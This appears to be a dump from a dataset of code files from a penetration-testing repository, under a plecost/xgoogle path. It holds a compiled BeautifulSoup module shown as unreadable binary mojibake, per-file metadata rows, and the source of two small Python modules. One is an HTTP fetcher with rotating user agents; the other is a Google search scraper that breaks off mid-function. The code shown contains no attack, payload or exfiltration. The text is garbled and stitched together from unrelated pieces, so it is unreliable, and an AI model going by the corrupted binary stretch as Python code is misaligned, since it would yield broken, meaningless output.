RfiR¯R˘RR˙R˚tselfClosingTags((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRìÓs@                    cCsWyt|É}Wntj odSXd|jo djnpdS|i|ÉS(s/This method fixes a bug in Python's SGMLParser.Nii(RÅRtconvert_codepoint(R R+tn((s)/pentest/plecost/xgoogle/BeautifulSoup.pytconvert_charref3scCs+|i}t|tÉo!t|dÉp d|_qpn7t||i|gd|iÉ}|i}|i|_|od|i oVt |i Ép|i |_ nx)|i D]\}}|i ||É}q´W|` q€n|i Éti||É|iÉx%|ii|ijo|iÉqWdS(NtoriginalEncodingR˙(RfiRRRRRt UnicodeDammitR˘R˙RR‰tMARKUP_MASSAGERÜtresetRtfeedtendDatat currentTagR+t ROOT_TAG_NAMEtpopTag(R tinDocumentEncodingRfitdammittfixtm((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR=s.        cCsÑ|idÉdjp,|idÉdjp|idÉdjoti||ÉS|idÉdjoti||ÉStÇdS(sàThis method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.tstart_itend_tdo_R©N(R RRaRjR^(R t methodName((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRa]s ,cCs#|ii|Ép|ii|ÉS(seReturns true iff the given string is the name of a self-closing tag according to this parser.(tSELF_CLOSING_TAGSRòRˇ(R R+((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRãjscCsati|||iÉd|_ti|Ég|_d|_g|_ g|_ |i |ÉdS(Ni( RjRìRRéRR t currentDataRR ttagStackt quoteStacktpushTag(R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR ps      cCsÅ|iiÉ}t|iiÉdjo4t|iidtÉo|iid|i_n|io|id|_n|iS(Niiiˇˇˇˇ(RRŒRR R RRR](R R'((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRzs cCsE|io|iii|Én|ii|É|id|_dS(Niˇˇˇˇ(R R R(R(R R'((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRàs cCs|ioÚdi|iÉ}|i|iÉp!d|jo d}qPd}ng|_|io=t|iÉdjo'|ii p|ii|É odS||É}|i |i |i É|i o||i _ n||_ |i i i|ÉndS(NR≥s R¥i(RR∏t translatetSTRIP_ASCII_SPACESR¯RRR-RFR R RRR R((R tcontainerClassRto((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR ès"         cCsπ||ijodSd}d}xVtt|iÉdddÉD]5}||i|ijot|iÉ|}PqAqAW|p|d}nx#td|ÉD]}|iÉ}qüW|S(s‹Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.Niiiˇˇˇˇ(RRR†RRR+R(R R+t inclusivePoptnumPopst mostRecentTagRK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt _popToTag§s  c Cs!|ii|É}|dj}|ii|É}d}t}x√tt|iÉdddÉD]¢}|i|}| p|i |jo| o |}Pn|djo|i |jp*|djo1|o*|ii|i Éo|i }t }Pn|i }q\W|o|i ||ÉndS(sÙWe need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' iiiˇˇˇˇN( t NESTABLE_TAGSRïRtRESET_NESTING_TAGSRòRDR†RRR+RçRR$( R R+tnestingResetTriggerst isNestabletisResetNestingtpopTot inclusiveRKtp((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt _smartPop∫s*       icCsb|io7ditdÑ|ÉÉ}|id||fÉdS|iÉ|i|É o| o|i|Én|io?t|i Édjo)|ii p|ii ||É odSt ||||i |iÉ}|io||i_n||_|i|É|p|i|Éo|iÉn||ijo|ii|Éd|_n|S(NR≥cSs|\}}d||fS(s %s="%s"((RáR{ty((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRâÌss<%s%s>i(RR∏Rêt handle_dataR RãR-R¯RRR-R„RjR RRRRt QUOTE_TAGSR(tliteral(R R+R,t selfClosingR'((s)/pentest/plecost/xgoogle/BeautifulSoup.pytunknown_starttagËs*   $    cCsñ|io*|id|jo|id|ÉdS|iÉ|i|É|io=|id|jo)|iiÉt|iÉdj|_ndS(Niˇˇˇˇs</%s>i(RR/R R$RŒRR1(R R+((s)/pentest/plecost/xgoogle/BeautifulSoup.pytunknown_endtags   cCs|ii|ÉdS(N(RR((R tdata((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR/scCs(|iÉ|i|É|i|ÉdS(sOAdds a certain piece of text to the tree as a NavigableString subclass.N(R R/(R R-tsubclass((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt_toStringSubclasss  cCs/|d djo d}n|i|tÉdS(s©Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.iRıu,xml version='1.0' encoding='%SOUP-ENCODING%'N(R7Rf(R R-((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt handle_pis cCs|i|tÉdS(s#Handle comments as Comment objects.N(R7Rh(R R-((s)/pentest/plecost/xgoogle/BeautifulSoup.pythandle_comment%scCs;|iott|ÉÉ}n d|}|i|ÉdS(s$Handle character references as data.s&#%s;N(R˚R~RÅR/(R trefR5((s)/pentest/plecost/xgoogle/BeautifulSoup.pythandle_charref)s  cCs¿d}|io.ytt|É}Wq>tj oq>Xn| o |io|ii|É}n| o,|io"|ii|É od|}n|pd|}n|i|ÉdS(sñHandle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.s&amp;%ss&%s;N( RR}R~RtKeyErrorRÄRRïR/(R R:R5((s)/pentest/plecost/xgoogle/BeautifulSoup.pythandle_entityref1s  cCs|i|tÉdS(s4Handle DOCTYPEs and the like as Declaration objects.N(R7Ri(R R5((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt handle_decl\scCs‚d}|i||d!djog|iid|É}|djot|iÉ}n|i|d|!}|d}|i|tÉnWyti||É}Wn=tj o1|i|}|i |É|t|É}nX|S(s`Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.i s <![CDATA[s]]>iˇˇˇˇiN( RtrawdataR RR7ReRtparse_declarationRR/(R RKtjRmR5ttoHandle((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR@`s    N((RTRURVRR%R&R0RÖR“R RR¸R˛R˝t ALL_ENTITIESRRRDRìRRRaRãR RRRR R$R-R3R4R/R7R8R9R;R=R>R@(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRÛ√sL   ) C      .       + t BeautifulSoupc BsseZdZdÑZed.dddddddd d g ÉZhd.d 6d.d 6Zd dddddddgZdddddgZ hgd6gd6ddgd6gd6dgd6dgd6Z hgd 6d d!d"d#gd$6d$gd%6d$gd&6d gd#6d gd!6d gd"6Z d'd(d)d*gZ ed.e d+e e e ÉZ egee e e ÉZeid,ÉZd-ÑZRS(/s This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.cOs8|idÉp|i|d<nti|||édS(NR˙(RòR¸RÛRì(R RßR.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRì§stbrthrtinputtimgtmetatspacertlinktframetbasetscriptttextareatspantfonttqtobjecttbdoRÜtsuptcentert blockquotetdivtfieldsettinstdeltoltultlitdltddtdtttablettbodyttfootttheadttrttdtthtaddresstformR,tpretnoscripts((^|;)\s*charset=)([^;]*)c Cséd}d}d}t}xmtdt|ÉÉD]V}||\}}|iÉ}|djo |}q.|djo|}|}q.q.W|oŒ|o«|ii|É} | o™t|dÉp|i|i jo:|ii dÑ|É} ||d| f||<t }qY| i dÉ} | o3| |ijo#| |_ |i|i ÉtÇqYq]n|id|É} | o|o t | _ndS( s¶Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.is http-equivtcontenttdeclaredHTMLEncodingcSs|idÉdS(is%SOUP-ENCODING%(R|(RÉ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRâˆs iRIN(RRçR†Rtlowert CHARSET_RERFRÕRR˘RÜRDR|RnRRR3Rè( R R,t httpEquivt contentTypetcontentTypeIndexttagNeedsEncodingSubstitutionRKRñR°RÉtnewAttrt newCharsetR'((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt start_meta€s@          N(RTRURVRìRÚRRR0tNESTABLE_INLINE_TAGStNESTABLE_BLOCK_TAGStNESTABLE_LIST_TAGStNESTABLE_TABLE_TAGStNON_NESTABLE_BLOCK_TAGSR&R%RÖR“RpRw(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRDts>.                RcBseZRS((RTRU(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRstICantBelieveItsBeautifulSoupcBsheZdZddddddddd d d d d ddddgZdgZegeieeÉZRS(syThe BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.temtbigRKtsmallttttabbrtacronymtstrongtcitetcodetdfntkbdtsamptvartbRl(RTRURVt*I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGSt)I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGSRÚRDR%(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR} s   t MinimalSoupcBs eZdZedÉZhZRS(sîThe MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.Rl(RTRURVRÚR&R%(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRé.s t BeautifulSOAPcBseZdZdÑZRS(sÀThis class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.cCsªt|iÉdjoî|id}|id}|iÉt|tÉo\t|iÉdjoFt|idtÉo/|ii|i É o|id||i <q™nt i |ÉdS(Niiˇˇˇˇi˛ˇˇˇi( RRRîRRjR RRüRòR+RÛR(R R'R((s)/pentest/plecost/xgoogle/BeautifulSoup.pyROs   &(RTRURVR(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRè;stRobustXMLParsercBseZRS((RTRU(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRêbstRobustHTMLParsercBseZRS((RTRU(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRëdstRobustWackAssHTMLParsercBseZRS((RTRU(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRífstRobustInsanelyWackAssHTMLParsercBseZRS((RTRU(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRìhstSimplifyingSOAPParsercBseZRS((RTRU(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRîjsRcBs\eZdZhdd6dd6ZgddÑZdÑZdÑZd ÑZd ÑZd ÑZ d ÑZ dfZ d ÑZ h dgd6dd6dhd6did6djd6dkd6dld!6dmd$6dnd'6dod*6dpd-6dqd06drd36d4d56dsd86d4d96d4d:6dtd=6dud@6dvdC6dwdF6dxdI6dydL6dzdO6d{dR6d|dU6d}dX6d~d[6dd^6d4d_6dÄdb6dÅde6ZRS(ÇsœA class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.s mac-romant macintoshs shift-jissx-sjisRıc Cst|i|É\|_}}||_g|_|djpt|tÉod|_t|É|_dSd}x)|D]!}|i|É}|oPqtqtW|p6x3||fD]!}|i|É}|oPq≠q≠Wn| o>t o7t|itÉ o#|it i |iÉdÉ}n|p0x-dD]!}|i|É}|oPq*q*Wn||_|p d|_ndS(NR≥ROsutf-8s windows-1252(sutf-8s windows-1252( t_detectEncodingRfiR˙ttriedEncodingsRRRRt _convertFromtchardettdetect( R RfitoverrideEncodingsR˙tdocumentEncodingtsniffedEncodingtutproposedEncodingtproposed_encoding((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRìôs<      ##  cCs`|ii|É}t|Étijo4|idjod|d}q\d|d}n|S(sDChanges a MS smart quote character to an XML or HTML entity.Rıs&#x%s;is&%s;i(tMS_CHARSRïRÁRËRÓR˙(R torigRÜ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt _subMSCharπs cs“ài|É}| p|àijodSàii|Éài}àio;|iÉdjo(tidÉi áfdÜ|É}ny(ài ||É}|à_|à_ Wnt j o }dSXàiS(Ns windows-1252s iso-8859-1s iso-8859-2s([Ä-ü])csài|idÉÉS(i(R£R|(R{(R (s)/pentest/plecost/xgoogle/BeautifulSoup.pyRâ—s(s windows-1252s iso-8859-1s iso-8859-2( t find_codecRóRR(RfiR˙RoRÖR“RÜt _toUnicodeRRÂ(R tproposedRfiRûte((R s)/pentest/plecost/xgoogle/BeautifulSoup.pyRòƒs$      c Cst|Édjo9|d djo(|dd!djod}|d}nºt|Édjo9|d djo(|dd!djod}|d}np|d d jod }|d}nK|d d jod }|d}n&|d d jod}|d}nt||É}|S(sGiven a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliasesiis˛ˇtsutf-16besˇ˛sutf-16leisÔªøsutf-8t˛ˇsutf-32besˇ˛sutf-32le(RR(R R5ROtnewdata((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR•‡s&$$cCsŸd#}}ys|d djo|i|É}n4|d djo"d}t|dÉidÉ}nt|ÉdjoK|d djo:|dd!djo&d}t|ddÉidÉ}n£|d d jo"d }t|d ÉidÉ}npt|ÉdjoK|d d jo:|dd!djo&d }t|dd ÉidÉ}n|d d jo"d }t|d ÉidÉ}nfl|d djo"d}t|dÉidÉ}n¨|d djo&d }t|dd ÉidÉ}nu|d djo&d}t|ddÉidÉ}n>|d djo&d}t|ddÉidÉ}nd}tidÉi|É}Wn d#}nX|o8|iÉdi É}|o|d$jo |}qÃn|||fS(%s3Given a document, tries to detect its XML encoding.isLoßît<?sutf-16besutf-8is˛ˇR®s<?sutf-16lesˇ˛t<sutf-32bes<sutf-32leR©sˇ˛isÔªøtasciis!^<\?.*encoding=['"](.*?)['"].*\?>isiso-10646-ucs-2sucs-2t csunicodesiso-10646-ucs-4sucs-4tcsucs4sutf-16sutf-32tutf_16tutf_32tutf16tu16N( siso-10646-ucs-2sucs-2s csunicodesiso-10646-ucs-4sucs-4scsucs4sutf-16sutf-32sutf_16sutf_32sutf16su16( Rt_ebcdic_to_asciiRRQRRÖR“RÉtgroupsRo(R txml_datat xml_encodingtsniffed_xml_encodingtxml_encoding_match((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRñ˘s` $ $        cCsi|i|ii||ÉÉpJ|o|i|iddÉÉp'|o|i|iddÉÉp|S(Nt-R≥t_(t_codectCHARSET_ALIASESRïRM(R tcharset((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR§9s##cCsI|p|Sd}yti|É|}Wnttfj onX|S(N(Rtcodecstlookupt LookupErrorR(R Rætcodec((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRº?s  cCsx|i}|ipUd}ddk}|iditttdÉÉÉditt|ÉÉÉ|_n|i|iÉS(Niiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇiˇˇˇˇR≥i(iiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇ( R_tEBCDIC_TO_ASCII_MAPR]t maketransR∏RêtchrR†R(R RSR«temapR]((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR¥Js.   =teurot20ACsÄR¥sÅtsbquot201AsÇtfnoft192sÉtbdquot201EsÑthellipt2026sÖtdaggert2020sÜtDaggert2021sátcirct2C6sàtpermilt2030sâtScaront160sätlsaquot2039sãtOEligt152såt?sçs#x17Dt17Dsésèsêtlsquot2018sëtrsquot2019sítldquot201Csìtrdquot201Dsîtbullt2022sïtndasht2013sñtmdasht2014sóttildet2DCsòttradet2122sôtscaront161sötrsaquot203Asõtoeligt153súsùs#x17Et17EsûtYumlR≥süN(seuros20AC(ssbquos201A(sfnofs192(sbdquos201E(shellips2026(sdaggers2020(sDaggers2021(scircs2C6(spermils2030(sScarons160(slsaquos2039(sOEligs152(s#x17Ds17D(slsquos2018(srsquos2019(sldquos201C(srdquos201D(sbulls2022(sndashs2013(smdashs2014(stildes2DC(strades2122(sscarons161(srsaquos203A(soeligs153(s#x17Es17E(sYumlR≥(RTRURVRΩRìR£RòR•RñR§RºRR√R¥R°(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRåsZ      @    t__main__(9RVt __future__Rt __author__t __version__t __copyright__t __license__tsgmllibRRRøRËRÖthtmlentitydefsRt ImportErrorR“ttagfindRcRRRReRfRhRiRjRBRÎRCR‰RµRÚRÛRDRÂRR}RéRèRêRëRíRìRîRôRtcjkcodecs.aliasest cjkcodecst iconv_codecRRTtsyststdinR˜tsoupR≈(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt<module>Nsv     ˇ"ˇnw   ˇ≤ì$ ' ¸  
66,285
Python
.py
468
137.935897
2,193
0.45339
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,921
browser.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/browser.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # http://www.catonmat.net/blog/python-library-for-google-search/ # # Code is licensed under MIT license. # import random import socket import urllib import urllib2 import httplib BROWSERS = ( # Top most popular browsers in my access.log on 2009.02.12 # tail -50000 access.log | # awk -F\" '{B[$6]++} END { for (b in B) { print B[b] ": " b } }' | # sort -rn | # head -20 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' ) TIMEOUT = 5 # socket timeout class BrowserError(Exception): def __init__(self, url, error): self.url = url self.error = error class PoolHTTPConnection(httplib.HTTPConnection): def connect(self): """Connect to the host and port specified in __init__.""" msg = "getaddrinfo returns an empty list" for res in socket.getaddrinfo(self.host, self.port, 0, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res try: self.sock = socket.socket(af, socktype, proto) if self.debuglevel > 0: print "connect: (%s, %s)" % (self.host, self.port) self.sock.settimeout(TIMEOUT) self.sock.connect(sa) except socket.error, msg: if self.debuglevel > 0: print 'connect fail:', (self.host, self.port) if self.sock: self.sock.close() self.sock = None continue break if not self.sock: raise socket.error, msg class PoolHTTPHandler(urllib2.HTTPHandler): def http_open(self, req): return self.do_open(PoolHTTPConnection, req) class Browser(object): def __init__(self, user_agent=BROWSERS[0], debug=False, use_pool=False): self.headers = { 'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-us,en;q=0.5' } self.debug = debug def get_page(self, url, data=None): handlers = [PoolHTTPHandler] opener = urllib2.build_opener(*handlers) if data: data = urllib.urlencode(data) request = urllib2.Request(url, data, self.headers) try: response = opener.open(request) return response.read() except (urllib2.HTTPError, urllib2.URLError), e: raise BrowserError(url, str(e)) except (socket.error, socket.sslerror), msg: raise BrowserError(url, msg) except socket.timeout, e: raise BrowserError(url, "timeout") except KeyboardInterrupt: raise except: raise BrowserError(url, "unknown error") def set_random_user_agent(self): self.headers['User-Agent'] = random.choice(BROWSERS) return self.headers['User-Agent']
4,597
Python
.py
95
39
144
0.599063
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,922
search.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/search.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # http://www.catonmat.net/blog/python-library-for-google-search/ # # Code is licensed under MIT license. # import re import urllib from htmlentitydefs import name2codepoint from BeautifulSoup import BeautifulSoup from browser import Browser, BrowserError class SearchError(Exception): """ Base class for Google Search exceptions. """ pass class ParseError(SearchError): """ Parse error in Google results. self.msg attribute contains explanation why parsing failed self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse Thrown only in debug mode """ def __init__(self, msg, tag): self.msg = msg self.tag = tag def __str__(self): return self.msg def html(self): return self.tag.prettify() class SearchResult: def __init__(self, title, url, desc): self.title = title self.url = url self.desc = desc def __str__(self): return 'Google Search Result: "%s"' % self.title class GoogleSearch(object): SEARCH_URL_0 = "http://www.google.com/search?hl=en&q=%(query)s&btnG=Google+Search" NEXT_PAGE_0 = "http://www.google.com/search?hl=en&q=%(query)s&start=%(start)d" SEARCH_URL_1 = "http://www.google.com/search?hl=en&q=%(query)s&num=%(num)d&btnG=Google+Search" NEXT_PAGE_1 = "http://www.google.com/search?hl=en&q=%(query)s&num=%(num)d&start=%(start)d" def __init__(self, query, random_agent=False, debug=False): self.query = query self.debug = debug self.browser = Browser(debug=debug) self.results_info = None self.eor = False # end of results self._page = 0 self._results_per_page = 10 self._last_from = 0 if random_agent: self.browser.set_random_user_agent() @property def num_results(self): if not self.results_info: page = self._get_results_page() self.results_info = self._extract_info(page) if self.results_info['total'] == 0: self.eor = True return self.results_info['total'] def _get_page(self): return self._page def _set_page(self, page): self._page = page page = property(_get_page, _set_page) def _get_results_per_page(self): return self._results_per_page def _set_results_par_page(self, rpp): self._results_per_page = rpp results_per_page = property(_get_results_per_page, _set_results_par_page) def get_results(self): """ Gets a page of results """ if self.eor: return [] page = self._get_results_page() search_info = self._extract_info(page) if not self.results_info: self.results_info = search_info if self.num_results == 0: self.eor = True return [] results = self._extract_results(page) if not results: self.eor = True return [] if self._page > 0 and search_info['from'] == self._last_from: self.eor = True return [] if search_info['to'] == search_info['total']: self.eor = True self._page += 1 self._last_from = search_info['from'] return results def _maybe_raise(self, cls, *arg): if self.debug: raise cls(*arg) def _get_results_page(self): if self._page == 0: if self._results_per_page == 10: url = GoogleSearch.SEARCH_URL_0 else: url = GoogleSearch.SEARCH_URL_1 else: if self._results_per_page == 10: url = GoogleSearch.NEXT_PAGE_0 else: url = GoogleSearch.NEXT_PAGE_1 safe_url = url % { 'query': urllib.quote_plus(self.query), 'start': self._page * self._results_per_page, 'num': self._results_per_page } try: page = self.browser.get_page(safe_url) except BrowserError, e: raise SearchError, "Failed getting %s: %s" % (e.url, e.error) return BeautifulSoup(page) def _extract_info(self, soup): empty_info = {'from': 0, 'to': 0, 'total': 0} div_ssb = soup.find('div', id='ssb') if not div_ssb: self._maybe_raise(ParseError, "Div with number of results was not found on Google search page", soup) return empty_info p = div_ssb.find('p') if not p: self._maybe_raise(ParseError, """<p> tag within <div id="ssb"> was not found on Google search page""", soup) return empty_info txt = ''.join(p.findAll(text=True)) txt = txt.replace(',', '') matches = re.search(r'Results (\d+) - (\d+) of (?:about )?(\d+)', txt, re.U) if not matches: return empty_info return {'from': int(matches.group(1)), 'to': int(matches.group(2)), 'total': int(matches.group(3))} def _extract_results(self, soup): results = soup.findAll('li', {'class': 'g'}) ret_res = [] for result in results: eres = self._extract_result(result) if eres: ret_res.append(eres) return ret_res def _extract_result(self, result): title, url = self._extract_title_url(result) desc = self._extract_description(result) if not title or not url or not desc: return None return SearchResult(title, url, desc) def _extract_title_url(self, result): #title_a = result.find('a', {'class': re.compile(r'\bl\b')}) title_a = result.find('a') if not title_a: self._maybe_raise(ParseError, "Title tag in Google search result was not found", result) return None, None title = ''.join(title_a.findAll(text=True)) title = self._html_unescape(title) url = title_a['href'] match = re.match(r'/url\?q=(http[^&]+)&', url) if match: url = urllib.unquote(match.group(1)) return title, url def _extract_description(self, result): desc_div = result.find('div', {'class': re.compile(r'\bs\b')}) if not desc_div: self._maybe_raise(ParseError, "Description tag in Google search result was not found", result) return None 